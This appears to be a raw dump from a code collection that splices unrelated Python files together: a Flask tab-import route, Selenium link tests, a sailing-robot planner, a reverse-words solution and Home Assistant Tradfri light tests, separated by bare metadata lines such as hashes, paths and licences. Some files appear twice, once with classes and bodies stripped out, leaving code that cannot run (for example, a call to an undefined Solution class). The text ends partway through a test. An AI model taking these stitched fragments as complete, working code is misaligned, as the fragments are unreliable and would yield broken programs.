#!/usr/bin/env python # -*- coding: utf-8 -*- import os import sys import shutil from uuid import uuid4 from flask import render_template, request, current_app, redirect, url_for, flash, Blueprint, jsonify from flask.ext.login import login_required from sqlalchemy import exists from guitarfan.extensions.flasksqlalchemy import db from guitarfan.utilities import oshelper from guitarfan.utilities import validator from guitarfan.models import * from forms.tab import * bp_admin_data = Blueprint('bp_admin_data', __name__, template_folder="../../templates/admin/tabs") @bp_admin_data.route('/admin/data/import', methods=['GET', 'POST']) @login_required def data_import(): if request.method == 'GET': return render_template('data_import.html') elif request.method == 'POST': root_path = request.form['path'] if 'path' in request.form else '' result_info = { 'artists': 0, 'tabs': 0, 'errors': [] } # check path if root_path == '' or not os.path.isdir(root_path): return jsonify(result='failed', msg='invalid path') # valid folder names are '0-9', 'other', 'a', 'b', 'c'...'z' valid_letter = map(chr, range(97, 123)) + ['0-9', 'other'] ### Traverse first level folders - letters for letter_dir_name in os.listdir(root_path): letter_dir_path = os.path.join(root_path, letter_dir_name) if not os.path.isdir(letter_dir_path) or not letter_dir_name.lower() in valid_letter: continue ### Traverse second level folders - artists for artist_dir_name in os.listdir(letter_dir_path): artist_dir_path = os.path.join(letter_dir_path, artist_dir_name) if not os.path.isdir(artist_dir_path): continue # create artist if not exist or just fetch it artist = Artist.query.filter_by(name=artist_dir_name).first() if artist is None: artist = Artist(str(uuid4()), artist_dir_name, letter_dir_name, '', 1, 1) db.session.add(artist) result_info['artists'] += 1 ## Traverse third level folders - tabs for tab_dir_name in os.listdir(artist_dir_path): tab_dir_path = os.path.join(artist_dir_path, tab_dir_name) if not os.path.isdir(tab_dir_path): continue # import tab if not exists if not db.session.query(exists().where(Tab.title == tab_dir_name and Tab.artist_id == artist.id)).scalar(): tab = Tab(str(uuid4()), tab_dir_name, 1, artist.id, 1, 1, '', None) db.session.add(tab) result_info['tabs'] += 1 ### Traverse imgs files under tab folder for file_name in os.listdir(tab_dir_path): file_path = os.path.join(tab_dir_path, file_name) if not os.path.isfile(file_path): continue if not oshelper.get_extension(file_name) in current_app.config['TAB_FILE_ALLOWED_EXTENSIONS']: continue try: dest_path = os.path.join(oshelper.get_tabfile_upload_abspath(), tab.id) if not os.path.isdir(dest_path): os.mkdir(dest_path) shutil.copy(file_path, dest_path) tabfile = TabFile(str(uuid4()), tab.id, os.path.join(tab.id, file_name)) db.session.add(tabfile) except: e = sys.exc_info()[0] result_info['errors'].append({ 'artist': artist_dir_name, 'tab': tab_dir_name, 'file': file_name, 'error': e }) continue db.session.commit() return jsonify(result='success', msg=result_info)
3,692
0
22
1a6635e183b5e8541c98be0db7c6d9ba49118650
5,655
py
Python
tests/test_rest_of_website.py
total-impact/impactstory-tester
7a1ba294aca1ccb97d03ad5abb48505790926d27
[ "MIT" ]
1
2015-02-19T15:17:56.000Z
2015-02-19T15:17:56.000Z
tests/test_rest_of_website.py
ourresearch/impactstory-tester
7a1ba294aca1ccb97d03ad5abb48505790926d27
[ "MIT" ]
null
null
null
tests/test_rest_of_website.py
ourresearch/impactstory-tester
7a1ba294aca1ccb97d03ad5abb48505790926d27
[ "MIT" ]
1
2015-01-10T13:50:12.000Z
2015-01-10T13:50:12.000Z
import os, requests from selenium_test_case import SeleniumTestCase, slow, online, wd, host import tests from tests.pages import faq_page, about_page from nose.tools import assert_equals, raises
65
1,876
0.681874
import os, requests from selenium_test_case import SeleniumTestCase, slow, online, wd, host import tests from tests.pages import faq_page, about_page from nose.tools import assert_equals, raises class TestFAQ(SeleniumTestCase): def setUp(self): self.page = faq_page.FaqPage(self.wd, self.host) def test_title(self): self.page.get() assert_equals(self.page.title, "FAQ") def test_which_products(self): self.page.get() assert "The number of readers who have added the article to their libraries" in self.page.html def test_tos_anchor_link(self): self.wd.get(self.page.url + "#tos") self.page.wait_till_loaded() assert_equals(self.page.title, "FAQ") @slow @online def test_all_links(self): self.page.get() print self.page.links #expected = [u'http://localhost:5000/faq#tos', u'http://www.wikipedia.org/', u'http://feedback.impactstory.org/', u'http://citedin.org/', u'http://www.crossref.org/', u'http://sciencecard.org/', u'http://www.delicious.com/', u'http://article-level-metrics.plos.org/', u'http://youtube.com/', u'http://github.com/', u'http://altmetric.com/', u'http://www.mendeley.com/groups/586171/altmetrics/papers/', u'http://blog.impactstory.org/2012/03/01/18535014681/', u'http://vimeo.com/', u'http://www.citeulike.org/', u'http://www.mendeley.com/', u'http://blog.impactstory.org/', u'http://www.topsy.com/', u'http://www.slideshare.net/', u'http://sloan.org/', u'http://altmetrics.org/manifesto/', u'http://gradschool.unc.edu/programs/royster', u'http://www.scienceseeker.org/', u'http://creativecommons.org/licenses/by/2.0/', u'http://beyond-impact.org/', u'http://figshare.com/', u'http://twitter.com/#!/ImpactStory', u'http://readermeter.org/', u'http://www.altmetric.com/', u'http://localhost:5000/#cool', u'http://localhost:5000/#limitations', u'http://localhost:5000/faq', u'https://www.zotero.org/groups/impact_factor_problems/items', u'http://pubmed.gov/', u'http://localhost:5000/about', u'https://github.com/mhahnel/Total-Impact/contributors', u'http://www.soros.org/', u'http://arxiv.org/', u'http://nsf.gov/', u'https://github.com/total-impact', u'http://www.info.sciverse.com/scopus/about', u'http://localhost:5000/#meaning', u'http://www.plumanalytics.com/', u'http://twitter.com/#!/ImpactStory_now', u'http://eprints.rclis.org/8605/', u'http://localhost:5000/settings/profile', u'http://asis.org/Bulletin/Apr-13/AprMay13_Piwowar_Priem.html', u'http://dataone.org/', u'http://localhost:5000/signup/name', u'http://impactstory.org/', u'http://localhost:5000/', u'http://wordpress.com/', u'http://www.datadryad.org/', u'http://twitter.com/', u'http://www.plos.org/'] #assert_equals(self.page.links, expected) for url in self.page.links: print url r = requests.get(url, verify=False) # don't check SSL certificates assert_equals(r.status_code, 200) class TestAbout(SeleniumTestCase): def setUp(self): SeleniumTestCase.setUp(self) self.page = about_page.AboutPage(self.wd, self.host) def test_title(self): self.page.get() assert_equals(self.page.title, "About") def test_team_anchor_link(self): self.wd.get(self.page.url + "#team") assert_equals(self.page.title, "About") @slow @online def test_all_links(self): self.page.get() print self.page.links #expected = [u'http://www.zotero.org/', u'http://localhost:5000/faq#tos', u'http://feedback.impactstory.org/', u'http://beyond-impact.org/', u'http://twitter.com/#!/ImpactStory', u'http://blog.impactstory.org/2012/03/01/18535014681/', u'http://blog.impactstory.org/', u'http://jasonpriem.org/blog', u'http://blog.impactstory.org/2013/06/17/sloan/', u'http://sloan.org/', u'http://altmetrics.org/manifesto/', u'http://twitter.com/researchremix', u'http://nsf.gov/', u'http://creativecommons.org/licenses/by/2.0/', u'http://www.plosone.org/article/info:doi/10.1371/journal.pone.0000308', u'http://localhost:5000/about', u'http://blog.impactstory.org/2012/03/29/20131290500/', u'http://www.plosone.org/article/info:doi/10.1371/journal.pone.0018657', u'https://twitter.com/jasonpriem/status/25844968813', u'http://jasonpriem.org/cv/#invited', u'http://blog.impactstory.org/2012/06/08/24638498595/', u'http://localhost:5000/faq', u'http://www.soros.org/', u'http://en.wikipedia.org/wiki/Radical_transparency', u'http://researchremix.wordpress.com/2010/10/12/journalpolicyproposal', u'http://localhost:5000/settings/profile', u'https://github.com/total-impact', u'http://localhost:5000/altmetrics.org/altmetrics12', u'http://twitter.com/#!/ImpactStory_now', u'http://researchremix.wordpress.com/', u'http://jasonpriem.org/cv/#refereed', u'http://asis.org/Bulletin/Apr-13/AprMay13_Piwowar_Priem.html', u'http://feedvis.com/', u'http://localhost:5000/signup/name', u'http://www.slideshare.net/hpiwowar', u'http://localhost:5000/', u'https://twitter.com/#!/jasonpriem', u'https://peerj.com/preprints/1/'] #assert_equals(self.page.links, expected) for url in self.page.links: print url r = requests.get(url, verify=False) # don't check SSL certificates assert_equals(r.status_code, 200) class TestFeedback(SeleniumTestCase): def setUp(self): SeleniumTestCase.setUp(self) self.url = "http://feedback.impactstory.org" def test_title(self): self.wd.get(self.url) title = self.wd.find_element_by_tag_name("h1").text expected = "General" assert_equals(title, expected)
4,976
335
132
d34a269d477cde58129f95111e3bfe221e6fa472
2,275
py
Python
USV_V1/applications/sailing_robot_control/src/sailing_robot/src/sailing_robot/heading_planning_station_keeping.py
supcon-nzic/-
52c97759f97f3222ca5465a5745842cfeb7f26a1
[ "Apache-2.0" ]
2
2020-07-16T03:15:10.000Z
2020-09-02T09:06:36.000Z
USV_V1/applications/sailing_robot_control/src/sailing_robot/src/sailing_robot/heading_planning_station_keeping.py
supcon-nzic/-
52c97759f97f3222ca5465a5745842cfeb7f26a1
[ "Apache-2.0" ]
null
null
null
USV_V1/applications/sailing_robot_control/src/sailing_robot/src/sailing_robot/heading_planning_station_keeping.py
supcon-nzic/-
52c97759f97f3222ca5465a5745842cfeb7f26a1
[ "Apache-2.0" ]
1
2021-01-20T12:47:14.000Z
2021-01-20T12:47:14.000Z
import heading_planning_laylines import json import make_ros_tasks
48.404255
115
0.64967
import heading_planning_laylines import json import make_ros_tasks class HeadingPlan(heading_planning_laylines.HeadingPlan): def __init__(self, *args, **kwargs): super(HeadingPlan, self).__init__(*args, **kwargs) self.debug_topics.extend( [('dbg_ball_position', 'String'), ('dbg_relative_position_list_len', 'Int16'), ('dbg_keeping', 'Bool'), ('dbg_keep_station_waypoint', 'String'), ]) self.station_keeping = None self.taskdict = { 'target_radius': self.target_radius, 'tack_voting_radius': self.tack_voting_radius, 'tasks': [{'kind': 'keep_station_three_point'}, ] } def calculate_state_and_goal(self): self.debug_pub('dbg_keeping', self.station_keeping is not None) self.debug_pub('dbg_relative_position_list_len', len(self.nav.relative_position_list)) if len(self.nav.relative_position_list) > 0: self.nav.calculate_ball_position() if self.nav.ball_position.distance(self.waypoint) < 10: self.debug_pub('dbg_ball_position', json.dumps( [self.nav.ball_position.lat.decimal_degree, self.nav.ball_position.lon.decimal_degree])) self.update_waypoint(self.nav.ball_position) if self.station_keeping is not None: self.station_keeping.update_waypoint(self.nav.ball_position) if self.station_keeping is None: dwp, hwp = self.nav.distance_and_heading(self.waypoint_xy) if dwp < self.target_radius: self.taskdict['tasks'][0].update({ 'waypoint': (self.waypoint.lat.decimal_degree, self.waypoint.lon.decimal_degree) }) self.station_keeping = \ make_ros_tasks.make_ros_tasks(self.taskdict, self.nav, self.name + '/station_keeping')[0] self.station_keeping.debug_pub = self.debug_pub return super(HeadingPlan, self).calculate_state_and_goal() else: return self.station_keeping.calculate_state_and_goal() def check_end_condition(self): """Are we there yet?""" return self.station_keeping is not None and self.station_keeping.check_end_condition()
1,932
252
23
c6524458859680d0d69f3723d59cb8ecc7c64fa7
205
py
Python
src/reverseWords/rev.py
rajitbanerjee/leetcode
720fcdd88d371e2d6592ceec8370a6760a77bb89
[ "CC0-1.0" ]
null
null
null
src/reverseWords/rev.py
rajitbanerjee/leetcode
720fcdd88d371e2d6592ceec8370a6760a77bb89
[ "CC0-1.0" ]
null
null
null
src/reverseWords/rev.py
rajitbanerjee/leetcode
720fcdd88d371e2d6592ceec8370a6760a77bb89
[ "CC0-1.0" ]
1
2021-04-28T18:17:55.000Z
2021-04-28T18:17:55.000Z
if __name__ == '__main__': s = input("Input: ") print(f"Output: {Solution().reverseWords(s)}")
22.777778
50
0.57561
class Solution: def reverseWords(self, s: str) -> str: return " ".join(s.split()[::-1]) if __name__ == '__main__': s = input("Input: ") print(f"Output: {Solution().reverseWords(s)}")
58
-6
48
4c691f66af872c1b99704980dafd3d5978718ed7
12,750
py
Python
tests/components/tradfri/test_light.py
petewill/home-assistant
5859dba4344f05fb8774aa1207e47ac28f627a67
[ "Apache-2.0" ]
3
2020-05-18T10:18:16.000Z
2020-12-08T11:27:55.000Z
tests/components/tradfri/test_light.py
petewill/home-assistant
5859dba4344f05fb8774aa1207e47ac28f627a67
[ "Apache-2.0" ]
19
2020-01-29T23:21:07.000Z
2021-07-23T23:26:51.000Z
tests/components/tradfri/test_light.py
petewill/home-assistant
5859dba4344f05fb8774aa1207e47ac28f627a67
[ "Apache-2.0" ]
6
2020-04-10T06:21:11.000Z
2021-07-01T08:53:38.000Z
"""Tradfri lights platform tests.""" from copy import deepcopy from unittest.mock import Mock, MagicMock, patch, PropertyMock import pytest from pytradfri.device import Device from pytradfri.device.light import Light from pytradfri.device.light_control import LightControl from homeassistant.components import tradfri from tests.common import MockConfigEntry DEFAULT_TEST_FEATURES = { "can_set_dimmer": False, "can_set_color": False, "can_set_temp": False, } # [ # {bulb features}, # {turn_on arguments}, # {expected result} # ] TURN_ON_TEST_CASES = [ # Turn On [{}, {}, {"state": "on"}], # Brightness > 0 [{"can_set_dimmer": True}, {"brightness": 100}, {"state": "on", "brightness": 100}], # Brightness == 1 [{"can_set_dimmer": True}, {"brightness": 1}, {"brightness": 1}], # Brightness > 254 [{"can_set_dimmer": True}, {"brightness": 1000}, {"brightness": 254}], # color_temp [{"can_set_temp": True}, {"color_temp": 250}, {"color_temp": 250}], # color_temp < 250 [{"can_set_temp": True}, {"color_temp": 1}, {"color_temp": 250}], # color_temp > 454 [{"can_set_temp": True}, {"color_temp": 1000}, {"color_temp": 454}], # hs color [ {"can_set_color": True}, {"hs_color": [300, 100]}, {"state": "on", "hs_color": [300, 100]}, ], # ct + brightness [ {"can_set_dimmer": True, "can_set_temp": True}, {"color_temp": 250, "brightness": 200}, {"state": "on", "color_temp": 250, "brightness": 200}, ], # ct + brightness (no temp support) [ {"can_set_dimmer": True, "can_set_temp": False, "can_set_color": True}, {"color_temp": 250, "brightness": 200}, {"state": "on", "hs_color": [26.807, 34.869], "brightness": 200}, ], # ct + brightness (no temp or color support) [ {"can_set_dimmer": True, "can_set_temp": False, "can_set_color": False}, {"color_temp": 250, "brightness": 200}, {"state": "on", "brightness": 200}, ], # hs + brightness [ {"can_set_dimmer": True, "can_set_color": True}, {"hs_color": [300, 100], "brightness": 200}, {"state": "on", "hs_color": [300, 100], "brightness": 200}, ], ] # Result of transition is not tested, but data is passed to turn on service. TRANSITION_CASES_FOR_TESTS = [None, 0, 1] @pytest.fixture(autouse=True, scope="module") def setup(request): """Set up patches for pytradfri methods.""" p_1 = patch( "pytradfri.device.LightControl.raw", new_callable=PropertyMock, return_value=[{"mock": "mock"}], ) p_2 = patch("pytradfri.device.LightControl.lights") p_1.start() p_2.start() def teardown(): """Remove patches for pytradfri methods.""" p_1.stop() p_2.stop() request.addfinalizer(teardown) @pytest.fixture def mock_gateway(): """Mock a Tradfri gateway.""" def get_devices(): """Return mock devices.""" return gateway.mock_devices def get_groups(): """Return mock groups.""" return gateway.mock_groups gateway = Mock( get_devices=get_devices, get_groups=get_groups, mock_devices=[], mock_groups=[], mock_responses=[], ) return gateway @pytest.fixture def mock_api(mock_gateway): """Mock api.""" async def api(command): """Mock api function.""" # Store the data for "real" command objects. if hasattr(command, "_data") and not isinstance(command, Mock): mock_gateway.mock_responses.append(command._data) return command return api async def generate_psk(self, code): """Mock psk.""" return "mock" async def setup_gateway(hass, mock_gateway, mock_api): """Load the Tradfri platform with a mock gateway.""" entry = MockConfigEntry( domain=tradfri.DOMAIN, data={ "host": "mock-host", "identity": "mock-identity", "key": "mock-key", "import_groups": True, "gateway_id": "mock-gateway-id", }, ) hass.data[tradfri.KEY_GATEWAY] = {entry.entry_id: mock_gateway} hass.data[tradfri.KEY_API] = {entry.entry_id: mock_api} await hass.config_entries.async_forward_entry_setup(entry, "light") def mock_light(test_features={}, test_state={}, n=0): """Mock a tradfri light.""" mock_light_data = Mock(**test_state) mock_light = Mock( id="mock-light-id-{}".format(n), reachable=True, observe=Mock(), device_info=MagicMock(), ) mock_light.name = "tradfri_light_{}".format(n) # Set supported features for the light. features = {**DEFAULT_TEST_FEATURES, **test_features} lc = LightControl(mock_light) for k, v in features.items(): setattr(lc, k, v) # Store the initial state. setattr(lc, "lights", [mock_light_data]) mock_light.light_control = lc return mock_light async def test_light(hass, mock_gateway, mock_api): """Test that lights are correctly added.""" features = {"can_set_dimmer": True, "can_set_color": True, "can_set_temp": True} state = { "state": True, "dimmer": 100, "color_temp": 250, "hsb_xy_color": (100, 100, 100, 100, 100), } mock_gateway.mock_devices.append( mock_light(test_features=features, test_state=state) ) await setup_gateway(hass, mock_gateway, mock_api) lamp_1 = hass.states.get("light.tradfri_light_0") assert lamp_1 is not None assert lamp_1.state == "on" assert lamp_1.attributes["brightness"] == 100 assert lamp_1.attributes["hs_color"] == (0.549, 0.153) async def test_light_observed(hass, mock_gateway, mock_api): """Test that lights are correctly observed.""" light = mock_light() mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) assert len(light.observe.mock_calls) > 0 async def test_light_available(hass, mock_gateway, mock_api): """Test light available property.""" light = mock_light({"state": True}, n=1) light.reachable = True light2 = mock_light({"state": True}, n=2) light2.reachable = False mock_gateway.mock_devices.append(light) mock_gateway.mock_devices.append(light2) await setup_gateway(hass, mock_gateway, mock_api) assert hass.states.get("light.tradfri_light_1").state == "on" assert hass.states.get("light.tradfri_light_2").state == "unavailable" # Combine TURN_ON_TEST_CASES and TRANSITION_CASES_FOR_TESTS ALL_TURN_ON_TEST_CASES = [["test_features", "test_data", "expected_result", "id"], []] idx = 1 for tc in TURN_ON_TEST_CASES: for trans in TRANSITION_CASES_FOR_TESTS: case = deepcopy(tc) if trans is not None: case[1]["transition"] = trans case.append(idx) idx = idx + 1 ALL_TURN_ON_TEST_CASES[1].append(case) @pytest.mark.parametrize(*ALL_TURN_ON_TEST_CASES) async def test_turn_on( hass, mock_gateway, mock_api, test_features, test_data, expected_result, id ): """Test turning on a light.""" # Note pytradfri style, not hass. Values not really important. initial_state = { "state": False, "dimmer": 0, "color_temp": 250, "hsb_xy_color": (100, 100, 100, 100, 100), } # Setup the gateway with a mock light. light = mock_light(test_features=test_features, test_state=initial_state, n=id) mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_on service call to change the light state. await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_light_{}".format(id), **test_data}, blocking=True, ) await hass.async_block_till_done() # Check that the light is observed. mock_func = light.observe assert len(mock_func.mock_calls) > 0 _, callkwargs = mock_func.call_args assert "callback" in callkwargs # Callback function to refresh light state. cb = callkwargs["callback"] responses = mock_gateway.mock_responses # State on command data. data = {"3311": [{"5850": 1}]} # Add data for all sent commands. for r in responses: data["3311"][0] = {**data["3311"][0], **r["3311"][0]} # Use the callback function to update the light state. dev = Device(data) light_data = Light(dev, 0) light.light_control.lights[0] = light_data cb(light) await hass.async_block_till_done() # Check that the state is correct. states = hass.states.get("light.tradfri_light_{}".format(id)) for k, v in expected_result.items(): if k == "state": assert states.state == v else: # Allow some rounding error in color conversions. assert states.attributes[k] == pytest.approx(v, abs=0.01) async def test_turn_off(hass, mock_gateway, mock_api): """Test turning off a light.""" state = {"state": True, "dimmer": 100} light = mock_light(test_state=state) mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_off service call to change the light state. await hass.services.async_call( "light", "turn_off", {"entity_id": "light.tradfri_light_0"}, blocking=True ) await hass.async_block_till_done() # Check that the light is observed. mock_func = light.observe assert len(mock_func.mock_calls) > 0 _, callkwargs = mock_func.call_args assert "callback" in callkwargs # Callback function to refresh light state. cb = callkwargs["callback"] responses = mock_gateway.mock_responses data = {"3311": [{}]} # Add data for all sent commands. for r in responses: data["3311"][0] = {**data["3311"][0], **r["3311"][0]} # Use the callback function to update the light state. dev = Device(data) light_data = Light(dev, 0) light.light_control.lights[0] = light_data cb(light) await hass.async_block_till_done() # Check that the state is correct. states = hass.states.get("light.tradfri_light_0") assert states.state == "off" def mock_group(test_state={}, n=0): """Mock a Tradfri group.""" default_state = {"state": False, "dimmer": 0} state = {**default_state, **test_state} mock_group = Mock(member_ids=[], observe=Mock(), **state) mock_group.name = "tradfri_group_{}".format(n) return mock_group async def test_group(hass, mock_gateway, mock_api): """Test that groups are correctly added.""" mock_gateway.mock_groups.append(mock_group()) state = {"state": True, "dimmer": 100} mock_gateway.mock_groups.append(mock_group(state, 1)) await setup_gateway(hass, mock_gateway, mock_api) group = hass.states.get("light.tradfri_group_0") assert group is not None assert group.state == "off" group = hass.states.get("light.tradfri_group_1") assert group is not None assert group.state == "on" assert group.attributes["brightness"] == 100 async def test_group_turn_on(hass, mock_gateway, mock_api): """Test turning on a group.""" group = mock_group() group2 = mock_group(n=1) group3 = mock_group(n=2) mock_gateway.mock_groups.append(group) mock_gateway.mock_groups.append(group2) mock_gateway.mock_groups.append(group3) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_off service call to change the light state. await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_0"}, blocking=True ) await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_1", "brightness": 100}, blocking=True, ) await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_2", "brightness": 100, "transition": 1}, blocking=True, ) await hass.async_block_till_done() group.set_state.assert_called_with(1) group2.set_dimmer.assert_called_with(100) group3.set_dimmer.assert_called_with(100, transition_time=10) async def test_group_turn_off(hass, mock_gateway, mock_api): """Test turning off a group.""" group = mock_group({"state": True}) mock_gateway.mock_groups.append(group) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_off service call to change the light state. await hass.services.async_call( "light", "turn_off", {"entity_id": "light.tradfri_group_0"}, blocking=True ) await hass.async_block_till_done() group.set_state.assert_called_with(0)
30.871671
88
0.645569
"""Tradfri lights platform tests.""" from copy import deepcopy from unittest.mock import Mock, MagicMock, patch, PropertyMock import pytest from pytradfri.device import Device from pytradfri.device.light import Light from pytradfri.device.light_control import LightControl from homeassistant.components import tradfri from tests.common import MockConfigEntry DEFAULT_TEST_FEATURES = { "can_set_dimmer": False, "can_set_color": False, "can_set_temp": False, } # [ # {bulb features}, # {turn_on arguments}, # {expected result} # ] TURN_ON_TEST_CASES = [ # Turn On [{}, {}, {"state": "on"}], # Brightness > 0 [{"can_set_dimmer": True}, {"brightness": 100}, {"state": "on", "brightness": 100}], # Brightness == 1 [{"can_set_dimmer": True}, {"brightness": 1}, {"brightness": 1}], # Brightness > 254 [{"can_set_dimmer": True}, {"brightness": 1000}, {"brightness": 254}], # color_temp [{"can_set_temp": True}, {"color_temp": 250}, {"color_temp": 250}], # color_temp < 250 [{"can_set_temp": True}, {"color_temp": 1}, {"color_temp": 250}], # color_temp > 454 [{"can_set_temp": True}, {"color_temp": 1000}, {"color_temp": 454}], # hs color [ {"can_set_color": True}, {"hs_color": [300, 100]}, {"state": "on", "hs_color": [300, 100]}, ], # ct + brightness [ {"can_set_dimmer": True, "can_set_temp": True}, {"color_temp": 250, "brightness": 200}, {"state": "on", "color_temp": 250, "brightness": 200}, ], # ct + brightness (no temp support) [ {"can_set_dimmer": True, "can_set_temp": False, "can_set_color": True}, {"color_temp": 250, "brightness": 200}, {"state": "on", "hs_color": [26.807, 34.869], "brightness": 200}, ], # ct + brightness (no temp or color support) [ {"can_set_dimmer": True, "can_set_temp": False, "can_set_color": False}, {"color_temp": 250, "brightness": 200}, {"state": "on", "brightness": 200}, ], # hs + brightness [ {"can_set_dimmer": True, "can_set_color": True}, {"hs_color": [300, 100], "brightness": 200}, {"state": "on", "hs_color": [300, 100], "brightness": 200}, ], ] # Result of transition is not tested, but data is passed to turn on service. TRANSITION_CASES_FOR_TESTS = [None, 0, 1] @pytest.fixture(autouse=True, scope="module") def setup(request): """Set up patches for pytradfri methods.""" p_1 = patch( "pytradfri.device.LightControl.raw", new_callable=PropertyMock, return_value=[{"mock": "mock"}], ) p_2 = patch("pytradfri.device.LightControl.lights") p_1.start() p_2.start() def teardown(): """Remove patches for pytradfri methods.""" p_1.stop() p_2.stop() request.addfinalizer(teardown) @pytest.fixture def mock_gateway(): """Mock a Tradfri gateway.""" def get_devices(): """Return mock devices.""" return gateway.mock_devices def get_groups(): """Return mock groups.""" return gateway.mock_groups gateway = Mock( get_devices=get_devices, get_groups=get_groups, mock_devices=[], mock_groups=[], mock_responses=[], ) return gateway @pytest.fixture def mock_api(mock_gateway): """Mock api.""" async def api(command): """Mock api function.""" # Store the data for "real" command objects. if hasattr(command, "_data") and not isinstance(command, Mock): mock_gateway.mock_responses.append(command._data) return command return api async def generate_psk(self, code): """Mock psk.""" return "mock" async def setup_gateway(hass, mock_gateway, mock_api): """Load the Tradfri platform with a mock gateway.""" entry = MockConfigEntry( domain=tradfri.DOMAIN, data={ "host": "mock-host", "identity": "mock-identity", "key": "mock-key", "import_groups": True, "gateway_id": "mock-gateway-id", }, ) hass.data[tradfri.KEY_GATEWAY] = {entry.entry_id: mock_gateway} hass.data[tradfri.KEY_API] = {entry.entry_id: mock_api} await hass.config_entries.async_forward_entry_setup(entry, "light") def mock_light(test_features={}, test_state={}, n=0): """Mock a tradfri light.""" mock_light_data = Mock(**test_state) mock_light = Mock( id="mock-light-id-{}".format(n), reachable=True, observe=Mock(), device_info=MagicMock(), ) mock_light.name = "tradfri_light_{}".format(n) # Set supported features for the light. features = {**DEFAULT_TEST_FEATURES, **test_features} lc = LightControl(mock_light) for k, v in features.items(): setattr(lc, k, v) # Store the initial state. setattr(lc, "lights", [mock_light_data]) mock_light.light_control = lc return mock_light async def test_light(hass, mock_gateway, mock_api): """Test that lights are correctly added.""" features = {"can_set_dimmer": True, "can_set_color": True, "can_set_temp": True} state = { "state": True, "dimmer": 100, "color_temp": 250, "hsb_xy_color": (100, 100, 100, 100, 100), } mock_gateway.mock_devices.append( mock_light(test_features=features, test_state=state) ) await setup_gateway(hass, mock_gateway, mock_api) lamp_1 = hass.states.get("light.tradfri_light_0") assert lamp_1 is not None assert lamp_1.state == "on" assert lamp_1.attributes["brightness"] == 100 assert lamp_1.attributes["hs_color"] == (0.549, 0.153) async def test_light_observed(hass, mock_gateway, mock_api): """Test that lights are correctly observed.""" light = mock_light() mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) assert len(light.observe.mock_calls) > 0 async def test_light_available(hass, mock_gateway, mock_api): """Test light available property.""" light = mock_light({"state": True}, n=1) light.reachable = True light2 = mock_light({"state": True}, n=2) light2.reachable = False mock_gateway.mock_devices.append(light) mock_gateway.mock_devices.append(light2) await setup_gateway(hass, mock_gateway, mock_api) assert hass.states.get("light.tradfri_light_1").state == "on" assert hass.states.get("light.tradfri_light_2").state == "unavailable" # Combine TURN_ON_TEST_CASES and TRANSITION_CASES_FOR_TESTS ALL_TURN_ON_TEST_CASES = [["test_features", "test_data", "expected_result", "id"], []] idx = 1 for tc in TURN_ON_TEST_CASES: for trans in TRANSITION_CASES_FOR_TESTS: case = deepcopy(tc) if trans is not None: case[1]["transition"] = trans case.append(idx) idx = idx + 1 ALL_TURN_ON_TEST_CASES[1].append(case) @pytest.mark.parametrize(*ALL_TURN_ON_TEST_CASES) async def test_turn_on( hass, mock_gateway, mock_api, test_features, test_data, expected_result, id ): """Test turning on a light.""" # Note pytradfri style, not hass. Values not really important. initial_state = { "state": False, "dimmer": 0, "color_temp": 250, "hsb_xy_color": (100, 100, 100, 100, 100), } # Setup the gateway with a mock light. light = mock_light(test_features=test_features, test_state=initial_state, n=id) mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_on service call to change the light state. await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_light_{}".format(id), **test_data}, blocking=True, ) await hass.async_block_till_done() # Check that the light is observed. mock_func = light.observe assert len(mock_func.mock_calls) > 0 _, callkwargs = mock_func.call_args assert "callback" in callkwargs # Callback function to refresh light state. cb = callkwargs["callback"] responses = mock_gateway.mock_responses # State on command data. data = {"3311": [{"5850": 1}]} # Add data for all sent commands. for r in responses: data["3311"][0] = {**data["3311"][0], **r["3311"][0]} # Use the callback function to update the light state. dev = Device(data) light_data = Light(dev, 0) light.light_control.lights[0] = light_data cb(light) await hass.async_block_till_done() # Check that the state is correct. states = hass.states.get("light.tradfri_light_{}".format(id)) for k, v in expected_result.items(): if k == "state": assert states.state == v else: # Allow some rounding error in color conversions. assert states.attributes[k] == pytest.approx(v, abs=0.01) async def test_turn_off(hass, mock_gateway, mock_api): """Test turning off a light.""" state = {"state": True, "dimmer": 100} light = mock_light(test_state=state) mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_off service call to change the light state. await hass.services.async_call( "light", "turn_off", {"entity_id": "light.tradfri_light_0"}, blocking=True ) await hass.async_block_till_done() # Check that the light is observed. mock_func = light.observe assert len(mock_func.mock_calls) > 0 _, callkwargs = mock_func.call_args assert "callback" in callkwargs # Callback function to refresh light state. cb = callkwargs["callback"] responses = mock_gateway.mock_responses data = {"3311": [{}]} # Add data for all sent commands. for r in responses: data["3311"][0] = {**data["3311"][0], **r["3311"][0]} # Use the callback function to update the light state. dev = Device(data) light_data = Light(dev, 0) light.light_control.lights[0] = light_data cb(light) await hass.async_block_till_done() # Check that the state is correct. states = hass.states.get("light.tradfri_light_0") assert states.state == "off" def mock_group(test_state={}, n=0): """Mock a Tradfri group.""" default_state = {"state": False, "dimmer": 0} state = {**default_state, **test_state} mock_group = Mock(member_ids=[], observe=Mock(), **state) mock_group.name = "tradfri_group_{}".format(n) return mock_group async def test_group(hass, mock_gateway, mock_api): """Test that groups are correctly added.""" mock_gateway.mock_groups.append(mock_group()) state = {"state": True, "dimmer": 100} mock_gateway.mock_groups.append(mock_group(state, 1)) await setup_gateway(hass, mock_gateway, mock_api) group = hass.states.get("light.tradfri_group_0") assert group is not None assert group.state == "off" group = hass.states.get("light.tradfri_group_1") assert group is not None assert group.state == "on" assert group.attributes["brightness"] == 100 async def test_group_turn_on(hass, mock_gateway, mock_api): """Test turning on a group.""" group = mock_group() group2 = mock_group(n=1) group3 = mock_group(n=2) mock_gateway.mock_groups.append(group) mock_gateway.mock_groups.append(group2) mock_gateway.mock_groups.append(group3) 